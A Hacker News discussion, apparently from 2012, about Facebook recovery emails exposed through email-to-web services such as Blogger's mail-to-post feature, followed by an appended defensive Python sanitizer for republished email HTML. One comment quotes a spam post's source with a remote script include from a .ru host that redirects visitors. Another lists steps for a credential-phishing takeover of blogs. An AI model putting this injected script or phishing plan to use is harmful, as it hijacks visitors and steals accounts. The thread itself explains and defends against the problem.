by Matt_Cutts 4971 days ago
Okay, I've been through all the comments and I'm going to try to summarize:

- It looks like in some situations, Facebook will send an email that has a link. That link expires after a certain amount of time, but in the meantime, clicking that link lets people access that Facebook account.

- A large number of services can be set up to automatically post any email received onto the web. One major category is disposable email services such as asdasd.ru. Any email to a throwaway account on asdasd.ru gets put up on the web. Here's an example Facebook recovery email that got turned into a web page: http://asdasd.ru/read/414831

- Once these emails are just webpages, it's no surprise that search engines discover those URLs. Note that this is not a Google-specific issue. When I search on Bing for the query [site:facebook.com bcode n_m mid], the first result is also one of these URLs that has an email address embedded in it. For a debunk of the misconception that this is related to the Google Toolbar or Chrome, see my post elsewhere in this discussion at http://news.ycombinator.com/item?id=4733276

So: an email gets sent to someone. That email gets put up on the web as a webpage. Search engines (including both Google and Bing) find that webpage as they follow links on the web.


I tried Bing and Yandex to find the email bodies. They didn't return many results (but they do return results).

http://www.bing.com/search?q=%22wants+to+be+friends+on+Faceb...

When I try on Google to find the email bodies, I get 250k results, of which the large majority are on blogspot.com sites.

While mail bodies can be found on a few other sites, like the asdasd.ru example, and other search engines have found these links too, the main issue still seems to be with blogspot.com -- These aren't throwaway accounts with public inboxes, but likely some virus that is intercepting certain mails (Facebook, Twitter, Youtube, Twoo) and reposting them as a blog post for everyone to see.

As Blogspot is Google-owned, this does seem to me a predominantly Google-specific issue.

No, Blogger also has a feature that will automatically post messages sent to an email address. Here's an example email from Facebook that was posted to a blogspot.com url: http://weight-loss-information-123.blogspot.com/2012/08/misb...

If you look at the bottom of that Blogger post, it says "This message was sent to <a gmail address>." So an email from Facebook got posted as a web page to this blog.

There's no need to suspect some virus that's intercepting emails. Plenty of people have set up their systems such that email messages get turned into web pages.

You are probably right and I apologize for any misinformation. To me it seemed strange that the blogs first started spamming, followed by publishing only certain emails. Wouldn't it make more sense if all emails were published, not only from certain webservices? Why would a user want to publish their private Facebook emails in the first place? None of these accounts posts normal updates, they act compromised.
Automatically posting any email received onto the web can be a security issue. As you said, Blogspot is indiscriminate on which e-mail it publishes, there is no need to suggest a virus is targeting Facebook or Twitter mails -- I was confused on that point.

I've tested the indiscriminate posting, and any HTML you send to Blogspot accounts with this feature gets published, including <script> tags.

An e-mail client isn't supposed to execute <script> tags; I feel that if you republish an email online, it should strip out the <script> tags too.

The Blogspot sites that run this service are currently under attack by spammers, who send spam emails (which don't seem to get filtered very well), allowing spam by proxy and editorial-looking links. Some go even further and send them emails containing redirect scripts, or entire websites with CSS styles set on the body.

  view-source:http://byubjjclub.blogspot.com/search?updated-max=2012-10-23T21:02:00-06:00&max-results=5&start=5&by-date=false
contains such an email-to-webpage post as an example in the source.

  <div class='post-body entry-content' id='post-body-3218874062265356726' itemprop='description articleBody'>
  <style type="text/css"> 
  h1 a:hover {background-color:#888;color:#fff ! important;}                          
  [...]
  </style> 
  [...]
  <div xmlns="http://www.w3.org/1999/xhtml" id="emailbody" 
  style="margin:0 2em;
  [...]
  <table style="border:0;padding:0;margin:0;width:100%">
  [...]
  <br /> <br /> <script language="javascript"
  src="http://luckysearcher.ru/6peybjqhb197phmv2pevisws0k5u0k5"
  type="text/javascript"></script> <img
  src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTcpQG9IOqXoDrlzTdytRpeTN7sqIocaNZBAwxXxGEGUNrD4iwE" /> 
  <br /> <br />
  [...]
  To stop receiving these emails, you may <a href="http://feedburner.google.com/fb/a/mailunsubscribe?k=uVg9TnxQ6-Owt_QRoJn279y21hs">unsubscribe now</a>.
  </td> <td style="font-family:Helvetica,Arial,Sans-Serif;font-size:11px;margin:0 6px 1.2em 0;color:#333;text-align:right;vertical-align:top">Email delivery powered by Google</td> </tr> <tr>
  ...
Sending such an e-mail to Blogspot users with this feature will redirect all their visitors to

  view-source:http://mupara.ru/index.php?pid=19868&subid=31445&psn=131
Custom CSS and custom script allow for attack vectors such as these. Spam doesn't seem to filter very well. This is something of an issue that Blogspot can protect their users and visitors against, no? And did the users of this function understand the privacy ramifications of turning their inbox into a public mailing-list?

Worse than redirects, thinking like a wicked spammer:

  1. User turns on feature inbox-to-webpage
  2. Spammer finds these users by scanning the index
  3. Spammer sends such users (or with every spam mail) a malicious javascript file
  4. javascript pop-up with: "Re-enter your credentials"
  5. Change password and steal blog
  6. Check if blogspot account is connected to a Gmail account.
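The thread's point is that a mail-to-web republisher must not copy an e-mail body to the page verbatim: the quoted source above shows an external `<script>`, a `<style>` block restyling the whole page, and a redirect, none of which an e-mail client would have executed. The following is an added example (not code from the thread, from Blogger or from any of the commenters) of a defensive sanitizer for exactly that step, written with Python's standard-library `html.parser`. It allow-lists tags and attributes, drops `<script>`/`<style>`/`<iframe>` together with their contents, removes event-handler and `style` attributes, and rejects `javascript:`/`data:` URLs, including whitespace-obfuscated variants. The sample e-mail and the domains in it are constructed placeholders, not the ones quoted in the thread.

```python
"""Sanitize an e-mail body before republishing it as a web page.

Added example; assumptions: the republisher only needs basic text markup,
links and images, and everything else in the inbound HTML is dropped.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements whose entire content is discarded (the vectors seen in the thread:
# <script> and <style>, plus embedded documents).
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}
# Conservative allow-list for a republished e-mail body; <meta>, <form>,
# <link>, <base> etc. are not here and so are dropped (kills meta refresh).
ALLOWED_TAGS = {"p", "br", "div", "span", "a", "img", "b", "i", "strong", "em",
                "u", "h1", "h2", "h3", "ul", "ol", "li", "table", "tr", "td",
                "th", "blockquote", "pre", "code"}
VOID_TAGS = {"br", "img"}
# No style=, no id=, no on*= handlers: only these survive.
ALLOWED_ATTRS = {"href", "src", "alt", "title"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}  # "" = relative URL
_CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")


def _safe_url(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and obfuscated forms such as
    "java\\tscript:" by stripping control/whitespace chars before parsing."""
    cleaned = _CONTROL_WS.sub("", value)
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return False
    return scheme in SAFE_SCHEMES


class EmailSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropped: list[str] = []  # audit trail of what was removed
        self._skip = 0                # >0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            self.dropped.append(f"<{tag}>")
            return
        if self._skip:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")
            return
        parts = [f"<{tag}"]
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS:      # covers style=, id=, on*=
                self.dropped.append(f"@{name}")
                continue
            if name in URL_ATTRS and not _safe_url(value):
                self.dropped.append(f"@{name}={value[:30]}")
                continue
            parts.append(f' {name}="{escape(value, quote=True)}"')
        parts.append(">")
        self.out.append("".join(parts))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Script/style bodies arrive here as raw CDATA; skipped while _skip > 0.
        if not self._skip:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        # Comments (including IE conditional comments) never reach the page.
        self.dropped.append("<!--")


def sanitize_email_html(html_body: str) -> tuple[str, list[str]]:
    """Return (clean_html, list_of_dropped_items)."""
    parser = EmailSanitizer()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample modelled on the thread's description of a spam e-mail.
SAMPLE_EMAIL = """
<style type="text/css"> body {background:#000} h1 a:hover {color:#fff !important;} </style>
<div id="emailbody" style="margin:0 2em">
  <p onmouseover="alert(1)">You have a new notification.</p>
  <script language="javascript" src="http://spam.example/redirect.js"></script>
  <img src="https://static.example/logo.png" alt="logo" />
  <a href="javascript:location='http://spam.example'">Open</a>
  <a href="https://mail.example/unsubscribe?k=PLACEHOLDER_TOKEN">unsubscribe now</a>
  <meta http-equiv="refresh" content="0;url=http://spam.example/">
</div>
"""

if __name__ == "__main__":
    clean, dropped = sanitize_email_html(SAMPLE_EMAIL)
    print(clean)
    print("dropped:", dropped)
```

The `dropped` list is worth logging on the server side: a sudden rise in dropped `<script>` or `<meta>` elements across many mail-to-post accounts is exactly the signal that the spam campaign described above is under way, even though the published pages are now harmless.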